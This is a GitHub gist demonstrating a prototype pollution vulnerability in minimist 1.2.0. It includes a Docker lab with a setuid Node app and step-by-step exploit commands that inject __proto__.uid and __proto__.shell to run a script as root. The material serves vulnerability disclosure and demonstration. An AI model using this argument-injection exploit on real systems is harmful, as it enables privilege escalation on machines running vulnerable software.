Skip to content

Instantly share code, notes, and snippets.

@Kirill89
Last active March 6, 2023 10:27
  • Star 6 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save Kirill89/47feb345b09bf081317f08dd43403a8a to your computer and use it in GitHub Desktop.
Prototype Pollution security vulnerability in minimist

Prototype Pollution security vulnerability in minimist

https://snyk.io/vuln/SNYK-JS-MINIMIST-559764

How to run:

  1. npm i
  2. npm run build
  3. npm run start

Definition

Now you are in a sandbox with permissions of just-user. Our goal is to create test.txt at the root of a container. For sure we don't have that permissions.

To validate it let's try to do the following:

echo "test" > /test.txt
bash: /test.txt: Permission denied

Exploit

  1. Create exploit script: printf '#!/bin/sh\necho "test" > /test.txt' > /tmp/exploit
  2. Give it execute permission: chmod +x /tmp/exploit
  3. Run the application: ./app --__proto__.uid 0 --__proto__.shell /tmp/exploit

To validate run cat /test.txt.

As you can see we have permission violation via vulnerable application.

const argv = require('minimist')(process.argv.slice(2));
const cp = require('child_process');
if (argv.help) {
console.log("This app has no options - just show list of files in root");
} else {
console.log(String(cp.execSync('ls /')));
}
FROM ubuntu:18.04
COPY ./app /app
RUN chmod u+s /app
RUN useradd -s /bin/bash just-user
USER just-user
{
"name": "poc",
"version": "1.0.0",
"description": "",
"main": "index.js",
"keywords": [],
"author": "",
"license": "ISC",
"scripts": {
"start": "docker run --rm -it poc bash",
"build": "npm run build:cli && npm run build:docker",
"build:cli": "pkg app.js --target node10-linux-x64",
"build:docker": "docker build . --tag poc"
},
"dependencies": {
"minimist": "1.2.0"
},
"devDependencies": {
"pkg": "4.4.4"
}
}
@Imebeez
Copy link

Imebeez commented Mar 6, 2023

Nice

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment